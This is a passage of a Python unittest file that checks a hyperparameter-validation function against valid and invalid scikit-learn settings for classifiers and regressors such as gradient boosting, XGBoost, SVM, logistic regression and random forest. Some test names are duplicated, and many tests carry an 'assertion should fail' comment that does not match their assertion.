def test_naivebayes_2(self):
algorithm = "NaiveBayesMultinomial"
params = {'alpha': -1.0, 'class_prior': None, 'fit_prior': True}
# assertion should fail
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_naivebayes_3(self):
algorithm = "NaiveBayesMultinomial"
params = {'alpha': 5.6, 'class_prior': None, 'fit_prior': False}
# assertion should fail
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_naivebayes_4(self):
algorithm = "NaiveBayesMultinomial"
params = {'alpha': 0, 'class_prior': None, 'fit_prior': True}
# assertion should fail
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
# ------------- GradientBoostingMachiness -------------------- #
def test_gbm_1(self):
algorithm = "GradientBoostingMachines"
params = {'ccp_alpha': 0.0,'criterion': 'friedman_mse','init': None,'learning_rate': 0.1,'loss': 'deviance','max_depth': 3,'max_features': None,'max_leaf_nodes': None,'min_impurity_decrease': 0.0,'min_impurity_split': None,'min_samples_leaf': 1,'min_samples_split': 2,'min_weight_fraction_leaf': 0.0,'n_estimators': 100,'n_iter_no_change': None,'random_state': None,'subsample': 1.0,'tol': 0.0001,'validation_fraction': 0.1,'verbose': 0,'warm_start': False}
# assertion should fail
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_gbm_2(self):
algorithm = "GradientBoostingMachines"
params = {'ccp_alpha': -1.9}
# assertion should fail
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_gbm_3(self):
algorithm = "GradientBoostingMachines"
params = {'ccp_alpha': 1.3,'criterion': 'somethingrandom'}
# assertion should fail
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_gbm_4(self):
algorithm = "GradientBoostingMachines"
params = {'ccp_alpha': 1.3,'criterion': 'mse', 'loss': 'exponential'}
# assertion should fail
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_gbm_5(self):
algorithm = "GradientBoostingMachines"
params = {'ccp_alpha': 1.3,'criterion': 'mse', 'loss': 'exponential','max_depth': 0}
# assertion should fail
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_gbm_6(self):
algorithm = "GradientBoostingMachines"
params = {'ccp_alpha': 1.3,'criterion': 'mse', 'loss': 'exponential','max_depth': 2,'max_leaf_nodes': 2.3}
# assertion should fail
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_gbm_7(self):
algorithm = "GradientBoostingMachines"
params = {'ccp_alpha': 1.3,'criterion': 'mse', 'loss': 'exponential','max_depth': 2,'max_leaf_nodes': 5, "min_impurity_decrease":2.3, "min_impurity_split":-3}
# assertion should fail
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_gbm_8(self):
algorithm = "GradientBoostingMachines"
params = {'ccp_alpha': 1.3,'criterion': 'mse', 'loss': 'exponential','max_depth': 2,'max_leaf_nodes': 5, "min_impurity_decrease":2.3, "min_impurity_split":-3}
# assertion should fail
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_gbm_8(self):
algorithm = "GradientBoostingMachines"
params = {'ccp_alpha': 1.3,'criterion': 'mse', 'loss': 'exponential','max_depth': 2,'max_leaf_nodes': 5, "min_impurity_decrease":2.3, "min_impurity_split":3, "min_samples_leaf":0.5}
# assertion should fail
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_gbm_9(self):
algorithm = "GradientBoostingMachines"
params = {'ccp_alpha': 1.3,'criterion': 'mse', 'loss': 'exponential','max_depth': 2,'max_leaf_nodes': 5, "min_impurity_decrease":2.3, "min_impurity_split":3, "min_samples_leaf":0.5,"min_samples_split":4}
# assertion should fail
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_gbm_10(self):
algorithm = "GradientBoostingMachines"
params = {'ccp_alpha': 1.3,'criterion': 'mse', 'loss': 'exponential','max_depth': 2,'max_leaf_nodes': 5, "min_impurity_decrease":2.3, "min_impurity_split":3, "min_samples_leaf":0.7,"min_samples_split":0}
# assertion should fail
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_gbm_11(self):
algorithm = "GradientBoostingMachines"
params = {'ccp_alpha': 1.3,'criterion': 'mse', 'loss': 'exponential','max_depth': 2,'max_leaf_nodes': 5, "min_impurity_decrease":2.3, "min_impurity_split":3, "min_samples_leaf":1,"min_samples_split":-10}
# assertion should fail
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_gbm_12(self):
algorithm = "GradientBoostingMachines"
params = {'ccp_alpha': 1.3,'criterion': 'mse', 'loss': 'exponential','max_depth': 2,'max_leaf_nodes': 5, "min_impurity_decrease":2.3, "n_iter_no_change":0}
# assertion should fail
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_gbm_13(self):
algorithm = "GradientBoostingMachines"
params = {'ccp_alpha': 1.3,'criterion': 'mse', 'loss': 'exponential','max_depth': 2,'max_leaf_nodes': 5, "min_impurity_decrease":2.3, "n_iter_no_change":1,"subsample":2.6}
# assertion should fail
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_gbm_14(self):
algorithm = "GradientBoostingMachines"
params = {'ccp_alpha': 1.3,'criterion': 'mse', 'loss': 'exponential','max_depth': 2,'max_leaf_nodes': 5, "min_impurity_decrease":2.3, "n_iter_no_change":1,"subsample":0.6}
# assertion should fail
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_gbm_15(self):
algorithm = "GradientBoostingMachines"
params = {'ccp_alpha': 1.3,"validation_fraction":30}
# assertion should fail
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_gbm_15(self):
algorithm = "GradientBoostingMachines"
params = {'ccp_alpha': 1.3,"validation_fraction":0.5}
# assertion should fail
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
# ------------- XGradientBoosting -------------------- #
def test_randomforest_1(self):
algorithm = "RandomForest"
params = {'bootstrap': True, 'ccp_alpha': 0.0, 'class_weight': None, 'criterion': 'gini', 'max_depth': None,
'max_features': 'auto', 'max_leaf_nodes': None, 'max_samples': None, 'min_impurity_decrease': 0.0,
'min_impurity_split': None, 'min_samples_leaf': 1, 'min_samples_split': 2,
'min_weight_fraction_leaf': 0.0, 'n_estimators': 100, 'n_jobs': None, 'oob_score': False,
'random_state': None, 'verbose': 0, 'warm_start': False}
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_bagging_1(self):
algorithm = "Bagging"
params = {'base_estimator': None, 'bootstrap': True, 'bootstrap_features': False, 'max_features': 1.0,
'max_samples': 1.0, 'n_estimators': 10, 'n_jobs': None, 'oob_score': False, 'random_state': None,
'verbose': 0, 'warm_start': False}
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_extratrees_1(self):
algorithm = "ExtraTrees"
params = {'bootstrap': False, 'ccp_alpha': 0.0, 'class_weight': None, 'criterion': 'gini', 'max_depth': None,
'max_features': 'auto', 'max_leaf_nodes': None, 'max_samples': None, 'min_impurity_decrease': 0.0,
'min_impurity_split': None, 'min_samples_leaf': 1, 'min_samples_split': 2,
'min_weight_fraction_leaf': 0.0, 'n_estimators': 100, 'n_jobs': None, 'oob_score': False,
'random_state': None, 'verbose': 0, 'warm_start': False}
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_knearestneighbors_1(self):
algorithm = "KNearestNeighbour"
params = {'algorithm': 'auto', 'leaf_size': 30, 'metric': 'minkowski', 'metric_params': None, 'n_jobs': None,
'n_neighbors': 5, 'p': 2, 'weights': 'uniform'}
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_adaboost_1(self):
algorithm = "AdaBoost"
params = {'algorithm': 'SAMME.R', 'base_estimator': None, 'learning_rate': 1.0, 'n_estimators': 50,
'random_state': None}
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_naivebayesmultinomial_1(self):
algorithm = "NaiveBayesMultinomial"
params = {'alpha': 1.0, 'class_prior': None, 'fit_prior': True}
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_GradientBoostingMachiness_1(self):
algorithm = "GradientBoostingMachines"
params = {'ccp_alpha': 0.0, 'criterion': 'friedman_mse', 'init': None, 'learning_rate': 0.1, 'loss': 'deviance',
'max_depth': 3, 'max_features': None, 'max_leaf_nodes': None, 'min_impurity_decrease': 0.0,
'min_impurity_split': None, 'min_samples_leaf': 1, 'min_samples_split': 2,
'min_weight_fraction_leaf': 0.0, 'n_estimators': 100, 'n_iter_no_change': None, 'random_state': None,
'subsample': 1.0, 'tol': 0.0001, 'validation_fraction': 0.1, 'verbose': 0, 'warm_start': False}
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
#----------------------XGradientBoosting-------------------------#
def test_xgradientboosting_1(self):
algorithm = "XGradientBoosting"
params = {'objective': 'binary:logistic','base_score': 123,'booster': None,'colsample_bylevel': None,'colsample_bynode': None, 'colsample_bytree': None,'gamma': None,'learning_rate': None,'max_delta_step': None,'max_depth': None, 'min_child_weight': None,'missing': None,'n_estimators': 100,'n_jobs': None,'random_state': None,'reg_alpha': None,'reg_lambda': None,'scale_pos_weight': None, 'subsample': None,'tree_method': None}
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_xgradientboosting_2(self):
algorithm = "XGradientBoosting"
params = {'objective': 'binary:logistic','base_score': 123,'booster': None,'colsample_bylevel': 2.5,'colsample_bynode': -2.4, 'colsample_bytree': None,'gamma': None,'learning_rate': None,'max_delta_step': None,'max_depth': None, 'min_child_weight': None,'missing': None,'n_estimators': 100,'n_jobs': None,'random_state': None,'reg_alpha': None,'reg_lambda': None,'scale_pos_weight': None, 'subsample': None,'tree_method': None}
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_xgradientboosting_3(self):
algorithm = "XGradientBoosting"
params = {'objective': 'binary:logistic','base_score': 123,'booster': None,'colsample_bylevel': 2.5,'colsample_bynode': -2.4, 'colsample_bytree': None,'gamma': -1.2,'learning_rate': None,'max_delta_step': None,'max_depth': None, 'min_child_weight': None,'missing': None,'n_estimators': 100,'n_jobs': None,'random_state': None,'reg_alpha': None,'reg_lambda': None,'scale_pos_weight': None, 'subsample': None,'tree_method': None}
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_xgradientboosting_3(self):
algorithm = "XGradientBoosting"
params = {'objective': 'binary:logistic','base_score': 123,'booster': None,'colsample_bylevel': 0.5,'colsample_bynode': 0.4, 'colsample_bytree': None,'gamma': -1.2,'learning_rate': None,'max_delta_step': None,'max_depth': None, 'min_child_weight': None,'missing': None,'n_estimators': 100,'n_jobs': None,'random_state': None,'reg_alpha': None,'reg_lambda': None,'scale_pos_weight': None, 'subsample': None,'tree_method': None}
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_xgradientboosting_4(self):
algorithm = "XGradientBoosting"
params = {'objective': 'binary:logistic','base_score': 123,'booster': None,'colsample_bylevel': 0.5,'colsample_bynode': 0.4, 'colsample_bytree': None,'gamma': 10,'learning_rate': -1,'max_delta_step': None,'max_depth': None, 'min_child_weight': None,'missing': None,'n_estimators': 100,'n_jobs': None,'random_state': None,'reg_alpha': None,'reg_lambda': None,'scale_pos_weight': None, 'subsample': None,'tree_method': None}
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_xgradientboosting_5(self):
algorithm = "XGradientBoosting"
params = {'objective': 'binary:logistic','base_score': 123,'booster': None,'colsample_bylevel': 0.5,'colsample_bynode': 0.4, 'colsample_bytree': None,'gamma': 10,'learning_rate': 2,'max_delta_step': 0,'max_depth': -1, 'min_child_weight': None,'missing': None,'n_estimators': 100,'n_jobs': None,'random_state': None,'reg_alpha': None,'reg_lambda': None,'scale_pos_weight': None, 'subsample': None,'tree_method': None}
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_xgradientboosting_6(self):
algorithm = "XGradientBoosting"
params = {'objective': 'binary:logistic','base_score': 123,'booster': None,'colsample_bylevel': 0.5,'colsample_bynode': 0.4, 'colsample_bytree': None,'gamma': 10,'learning_rate': 2,'max_delta_step': 0,'max_depth': 3, 'min_child_weight': None,'missing': None,'n_estimators': -100,'n_jobs': None,'random_state': None,'reg_alpha': None,'reg_lambda': None,'scale_pos_weight': None, 'subsample': None,'tree_method': None}
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_xgradientboosting_7(self):
algorithm = "XGradientBoosting"
params = {'objective': 'binary:logistic','base_score': 123,'booster': None,'colsample_bylevel': 0.5,'colsample_bynode': 0.4, 'colsample_bytree': None,'gamma': 10,'learning_rate': 2,'max_delta_step': 0,'max_depth': 3, 'min_child_weight': None,'missing': None,'n_estimators': 100,'n_jobs': None,'random_state': None,'reg_alpha': None,'reg_lambda': None,'scale_pos_weight': None, 'subsample': None,'tree_method': None}
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
#------------------------------------ SupportVectorMachines ----------------------------------------#
def test_supportvectormachines_1(self):
algorithm = "SupportVectorMachines"
params = {'C': 1.0, 'break_ties': False, 'cache_size': 200, 'class_weight': None, 'coef0': 0.0,
'decision_function_shape': 'ovr', 'degree': 3, 'gamma': 'scale', 'kernel': 'rbf', 'max_iter': -1,
'probability': False, 'random_state': None, 'shrinking': True, 'tol': 0.001, 'verbose': False}
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_supportvectormachines_2(self):
algorithm = "SupportVectorMachines"
params = {'C': -1.0, 'break_ties': False, 'cache_size': 200, 'class_weight': None, 'coef0': 0.0,
'decision_function_shape': 'ovr', 'degree': 3, 'gamma': 'scale', 'kernel': 'rbf', 'max_iter': -1,
'probability': False, 'random_state': None, 'shrinking': True, 'tol': 0.001, 'verbose': False}
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_supportvectormachines_3(self):
algorithm = "SupportVectorMachines"
params = {'C': 1.0, 'break_ties': False, 'cache_size': 200, 'class_weight': None, 'coef0': "canbeanything",
'decision_function_shape': 'ovr', 'degree': 3, 'gamma': 'scale', 'kernel': 'rbf', 'max_iter': -1,
'probability': False, 'random_state': None, 'shrinking': True, 'tol': 0.001, 'verbose': False}
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_supportvectormachines_4(self):
algorithm = "SupportVectorMachines"
params = {'C': 1.0, 'break_ties': False, 'cache_size': 200, 'class_weight': None, 'coef0': "canbeanything",
'decision_function_shape': 'ovr', 'degree': -3, 'gamma': 'scale', 'kernel': 'rbf', 'max_iter': -1,
'probability': False, 'random_state': None, 'shrinking': True, 'tol': 0.001, 'verbose': False}
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_supportvectormachines_5(self):
algorithm = "SupportVectorMachines"
params = {'C': 1.0, 'break_ties': False, 'cache_size': 200, 'class_weight': None, 'coef0': "canbeanything",
'decision_function_shape': 'ovr', 'degree': 30, 'gamma': 'scale', 'kernel': 'rbf', 'max_iter': -1.9,
'probability': False, 'random_state': None, 'shrinking': True, 'tol': 0.001, 'verbose': False}
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_supportvectormachines_6(self):
algorithm = "SupportVectorMachines"
params = {'C': 1.0, 'break_ties': False, 'cache_size': 200, 'class_weight': None, 'coef0': "canbeanything",
'decision_function_shape': 'ovr', 'degree': 30, 'gamma': 'scale', 'kernel': 'rbf', 'max_iter': -3,
'probability': False, 'random_state': None, 'shrinking': True, 'tol': -0.001, 'verbose': False}
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_supportvectormachines_7(self):
algorithm = "SupportVectorMachines"
params = {'C': 1.0, 'break_ties': False, 'cache_size': 200, 'class_weight': None, 'coef0': "canbeanything",
'decision_function_shape': 'ovr', 'degree': 30, 'gamma': 'scale', 'kernel': 'rbf', 'max_iter': -3,
'probability': False, 'random_state': None, 'shrinking': True, 'tol': 0.001, 'verbose': False}
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
#-----------------------LogisticRegression--------------------------------#
def test_logisticregression_1(self):
algorithm = "LogisticRegression"
params = {'C': 1.0, 'class_weight': None, 'dual': False, 'fit_intercept': True, 'intercept_scaling': 1,
'l1_ratio': None, 'max_iter': 100, 'multi_class': 'auto', 'n_jobs': None, 'penalty': 'l2',
'random_state': None, 'solver': 'lbfgs', 'tol': 0.0001, 'verbose': 0, 'warm_start': False}
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_logisticregression_2(self):
algorithm = "LogisticRegression"
params = {'C': -1.0, 'class_weight': None, 'dual': False, 'fit_intercept': True, 'intercept_scaling': 1,
'l1_ratio': None, 'max_iter': 100, 'multi_class': 'auto', 'n_jobs': None, 'penalty': 'l2',
'random_state': None, 'solver': 'lbfgs', 'tol': 0.0001, 'verbose': 0, 'warm_start': False}
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_logisticregression_3(self):
algorithm = "LogisticRegression"
params = {'C': 1.0, 'class_weight': None, 'dual': False, 'fit_intercept': True, 'intercept_scaling': -1.90,
'l1_ratio': None, 'max_iter': 100, 'multi_class': 'auto', 'n_jobs': None, 'penalty': 'l2',
'random_state': None, 'solver': 'lbfgs', 'tol': 0.0001, 'verbose': 0, 'warm_start': False}
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_logisticregression_4(self):
algorithm = "LogisticRegression"
params = {'C': 1.0, 'class_weight': None, 'dual': False, 'fit_intercept': True, 'intercept_scaling': 1.89,
'l1_ratio': None, 'max_iter': -10.0, 'multi_class': 'auto', 'n_jobs': None, 'penalty': 'l2',
'random_state': None, 'solver': 'lbfgs', 'tol': 0.0001, 'verbose': 0, 'warm_start': False}
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_logisticregression_5(self):
algorithm = "LogisticRegression"
params = {'C': 1.0, 'class_weight': None, 'dual': False, 'fit_intercept': True, 'intercept_scaling': 1,
'l1_ratio': None, 'max_iter': "100", 'multi_class': 'auto', 'n_jobs': None, 'penalty': 'l2',
'random_state': None, 'solver': 'lbfgs', 'tol': 0.0001, 'verbose': 0, 'warm_start': False}
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_logisticregression_6(self):
algorithm = "LogisticRegression"
params = {'C': 1.0, 'class_weight': None, 'dual': False, 'fit_intercept': True, 'intercept_scaling': 1,
'l1_ratio': None, 'max_iter': 100, 'multi_class': 'auto', 'n_jobs': None, 'penalty': 'randomstring',
'random_state': None, 'solver': 'lbfgs', 'tol': 0.0001, 'verbose': 0, 'warm_start': False}
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_logisticregression_7(self):
algorithm = "LogisticRegression"
params = {'C': 1.0, 'class_weight': None, 'dual': False, 'fit_intercept': True, 'intercept_scaling': 1,
'l1_ratio': None, 'max_iter': 100, 'multi_class': 'auto', 'n_jobs': None, 'penalty': 'l2',
'random_state': None, 'solver': 'lbfgs', 'tol': -0.0001, 'verbose': 0, 'warm_start': False}
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_logisticregression_8(self):
algorithm = "LogisticRegression"
params = {'C': 4.0, 'class_weight': None, 'dual': False, 'fit_intercept': False, 'intercept_scaling': 1,
'l1_ratio': None, 'max_iter': 10000, 'multi_class': 'auto', 'n_jobs': None, 'penalty': 'l1',
'random_state': None, 'solver': 'lbfgs', 'tol': 0.0001, 'verbose': 0, 'warm_start': False}
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
class TestScikitRegressionAlgo(unittest.TestCase):
def setUp(self):
self.library = "scikit"
self.service = "regression"
pass
# ----------------- DecisionTreess -------------------#
def test_DecisionTrees_1(self):
algorithm = "DecisionTrees"
params = {'ccp_alpha': 0.0, 'criterion': 'mse', 'max_depth': None, 'max_features': None, 'max_leaf_nodes': None,
'min_impurity_decrease': 0.0, 'min_impurity_split': None, 'min_samples_leaf': 1,
'min_samples_split': 2, 'min_weight_fraction_leaf': 0.0, 'random_state': None, 'splitter': 'best'}
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_DecisionTrees_2(self):
algorithm = "DecisionTrees"
params = {'ccp_alpha': -0.3, 'criterion': 'mse', 'max_depth': None, 'max_features': None, 'max_leaf_nodes': None,
'min_impurity_decrease': 0.0, 'min_impurity_split': None, 'min_samples_leaf': 1,
'min_samples_split': 2, 'min_weight_fraction_leaf': 0.0, 'random_state': None, 'splitter': 'best'}
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_DecisionTrees_3(self):
algorithm = "DecisionTrees"
params = {'ccp_alpha': 3, 'criterion': 'mse', 'max_depth': None, 'max_features': None, 'max_leaf_nodes': None,
'min_impurity_decrease': 0.0, 'min_impurity_split': None, 'min_samples_leaf': -1,
'min_samples_split': 2, 'min_weight_fraction_leaf': 0.0, 'random_state': None, 'splitter': 'best'}
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_DecisionTrees_4(self):
algorithm = "DecisionTrees"
params = {'ccp_alpha': 3, 'criterion': 'mse', 'max_depth': None, 'max_features': None, 'max_leaf_nodes': None,
'min_impurity_decrease': 0.0, 'min_impurity_split': None, 'min_samples_leaf': 0.5,
'min_samples_split': -2, 'min_weight_fraction_leaf': 0.0, 'random_state': None, 'splitter': 'best'}
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_DecisionTrees_5(self):
algorithm = "DecisionTrees"
params = {'ccp_alpha': 3, 'criterion': 'mse', 'max_depth': None, 'max_features': None, 'max_leaf_nodes': None,
'min_impurity_decrease': 0.0, 'min_impurity_split': None, 'min_samples_leaf': 0.5,
'min_samples_split': 0.3, 'min_weight_fraction_leaf': 0.4, 'random_state': None, 'splitter': 'best'}
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
# ----------------- RandomForest -------------------#
def test_randomforest_1(self):
algorithm = "RandomForest"
params = {'bootstrap': True, 'ccp_alpha': 0.0, 'criterion': 'mse', 'max_depth': None, 'max_features': 'auto',
'max_leaf_nodes': None, 'max_samples': None, 'min_impurity_decrease': 0.0, 'min_impurity_split': None,
'min_samples_leaf': 1, 'min_samples_split': 2, 'min_weight_fraction_leaf': 0.0, 'n_estimators': 100,
'n_jobs': None, 'oob_score': False, 'random_state': None, 'verbose': 0, 'warm_start': False}
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_randomforest_2(self):
algorithm = "RandomForest"
params = {'bootstrap': False, 'ccp_alpha': 0.0, 'criterion': 'mse', 'max_depth': None, 'max_features': 'auto',
'max_leaf_nodes': None, 'max_samples': None, 'min_impurity_decrease': -34.789, 'min_impurity_split': None,
'min_samples_leaf': 1, 'min_samples_split': 2, 'min_weight_fraction_leaf': 0.0, 'n_estimators': 100,
'n_jobs': None, 'oob_score': False, 'random_state': None, 'verbose': 0, 'warm_start': False}
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_randomforest_3(self):
algorithm = "RandomForest"
params = {'bootstrap': True, 'ccp_alpha': 0.0, 'criterion': 'mse', 'max_depth': -1.3, 'max_features': 'auto',
'max_leaf_nodes': None, 'max_samples': None, 'min_impurity_decrease': 0.0, 'min_impurity_split': None,
'min_samples_leaf': 1, 'min_samples_split': 2, 'min_weight_fraction_leaf': 0.0, 'n_estimators': 100,
'n_jobs': None, 'oob_score': False, 'random_state': None, 'verbose': 0, 'warm_start': False}
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_randomforest_4(self):
algorithm = "RandomForest"
params = {'bootstrap': True, 'ccp_alpha': 0.0, 'criterion': 'mse', 'max_depth': None, 'max_features': 'auto',
'max_leaf_nodes': None, 'max_samples': None, 'min_impurity_decrease': -0.2, 'min_impurity_split': None,
'min_samples_leaf': 1, 'min_samples_split': 2, 'min_weight_fraction_leaf': 0.0, 'n_estimators': 100,
'n_jobs': None, 'oob_score': False, 'random_state': None, 'verbose': 0, 'warm_start': False}
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_randomforest_5(self):
algorithm = "RandomForest"
params = {'bootstrap': True, 'ccp_alpha': 0.0, 'criterion': 'mse', 'max_depth': None, 'max_features': 'auto',
'max_leaf_nodes': None, 'max_samples': None, 'min_impurity_decrease': 0.0, 'min_impurity_split': None,
'min_samples_leaf': 1, 'min_samples_split': 2, 'min_weight_fraction_leaf': 0.0, 'n_estimators': -100,
'n_jobs': None, 'oob_score': False, 'random_state': None, 'verbose': 0, 'warm_start': False}
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_randomforest_6(self):
algorithm = "RandomForest"
params = {'bootstrap': True, 'ccp_alpha': 0.0, 'criterion': 'mse', 'max_depth': None, 'max_features': 'auto',
'max_leaf_nodes': None, 'max_samples': None, 'min_impurity_decrease': 0.0, 'min_impurity_split': None,
'min_samples_leaf': 1, 'min_samples_split': 2, 'min_weight_fraction_leaf': 0.0, 'n_estimators': 100,
'n_jobs': None, 'oob_score': "radom", 'random_state': None, 'verbose': 0, 'warm_start': False}
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_randomforest_7(self):
algorithm = "RandomForest"
params = {'bootstrap': True, 'ccp_alpha': 5, 'criterion': 'mse', 'max_depth': None, 'max_features': 'auto',
'max_leaf_nodes': None, 'max_samples': None, 'min_impurity_decrease': 1.67, 'min_impurity_split': None,
'min_samples_leaf': 1, 'min_samples_split': 6, 'min_weight_fraction_leaf': 0.0, 'n_estimators': 100,
'n_jobs': None, 'oob_score': False, 'random_state': None, 'verbose': 0, 'warm_start': False}
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
# ----------------- Bagging -------------------#
def test_bagging_1(self):
algorithm = "Bagging"
params = {'base_estimator': None, 'bootstrap': True, 'bootstrap_features': False, 'max_features': 1.0,
'max_samples': 1.0, 'n_estimators': 10, 'n_jobs': None, 'oob_score': False, 'random_state': None,
'verbose': 0, 'warm_start': False}
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_bagging_2(self):
algorithm = "Bagging"
params = {'base_estimator': None, 'bootstrap': False, 'bootstrap_features': False, 'max_features': -3565,
'max_samples': 345, 'n_estimators': 10, 'n_jobs': None, 'oob_score': False, 'random_state': None,
'verbose': 0, 'warm_start': False}
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_bagging_3(self):
algorithm = "Bagging"
params = {'base_estimator': None, 'bootstrap': True, 'bootstrap_features': False, 'max_features': 1.0,
'max_samples': 1.0, 'n_estimators': 10, 'n_jobs': None, 'oob_score': False, 'random_state': None,
'verbose': 0, 'warm_start': False}
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_bagging_4(self):
algorithm = "Bagging"
params = {'base_estimator': None, 'bootstrap': True, 'bootstrap_features': False, 'max_features': 1.0,
'max_samples': 1.0, 'n_estimators': 10, 'n_jobs': None, 'oob_score': False, 'random_state': None,
'verbose': 0, 'warm_start': False}
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
# ----------------- GradientBoostingMachines -------------------#
def test_GradientBoostingMachines_1(self):
algorithm = "GradientBoostingMachines"
params = {'alpha': 0.9, 'ccp_alpha': 0.0, 'criterion': 'friedman_mse', 'init': None, 'learning_rate': 0.1,
'loss': 'ls', 'max_depth': 3, 'max_features': None, 'max_leaf_nodes': None,
'min_impurity_decrease': 0.0, 'min_impurity_split': None, 'min_samples_leaf': 1,
'min_samples_split': 2, 'min_weight_fraction_leaf': 0.0, 'n_estimators': 100,
'n_iter_no_change': None, 'random_state': None, 'subsample': 1.0, 'tol': 0.0001,
'validation_fraction': 0.1, 'verbose': 0, 'warm_start': False}
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_GradientBoostingMachines_2(self):
algorithm = "GradientBoostingMachines"
params = {'alpha': -0.9, 'ccp_alpha': 0.06, 'criterion': 'friedman_mse', 'init': None, 'learning_rate': 0.1,
'loss': 'ls', 'max_depth': 3, 'max_features': None, 'max_leaf_nodes': None,
'min_impurity_decrease': 0.0, 'min_impurity_split': None, 'min_samples_leaf': 1,
'min_samples_split': 2, 'min_weight_fraction_leaf': 0.0, 'n_estimators': 100,
'n_iter_no_change': None, 'random_state': None, 'subsample': 1.0, 'tol': 0.0001,
'validation_fraction': 0.1, 'verbose': 0, 'warm_start': False}
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_GradientBoostingMachines_3(self):
algorithm = "GradientBoostingMachines"
params = {'alpha': 0.9, 'ccp_alpha': 0.0, 'criterion': 'friedman_mse', 'init': None, 'learning_rate': -0.1,
'loss': 'ls', 'max_depth': 3, 'max_features': None, 'max_leaf_nodes': None,
'min_impurity_decrease': 0.0, 'min_impurity_split': None, 'min_samples_leaf': 1,
'min_samples_split': 2, 'min_weight_fraction_leaf': 0.0, 'n_estimators': 100,
'n_iter_no_change': None, 'random_state': None, 'subsample': 1.0, 'tol': 0.0001,
'validation_fraction': 0.1, 'verbose': 0, 'warm_start': False}
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_GradientBoostingMachines_4(self):
algorithm = "GradientBoostingMachines"
params = {'alpha': 0.9, 'ccp_alpha': 0.0, 'criterion': 'friedman_mse', 'init': None, 'learning_rate': 56,
'loss': 'ls', 'max_depth': -3, 'max_features': None, 'max_leaf_nodes': None,
'min_impurity_decrease': 0.0, 'min_impurity_split': None, 'min_samples_leaf': 1,
'min_samples_split': 2, 'min_weight_fraction_leaf': 0.0, 'n_estimators': 100,
'n_iter_no_change': None, 'random_state': None, 'subsample': 1.0, 'tol': 0.0001,
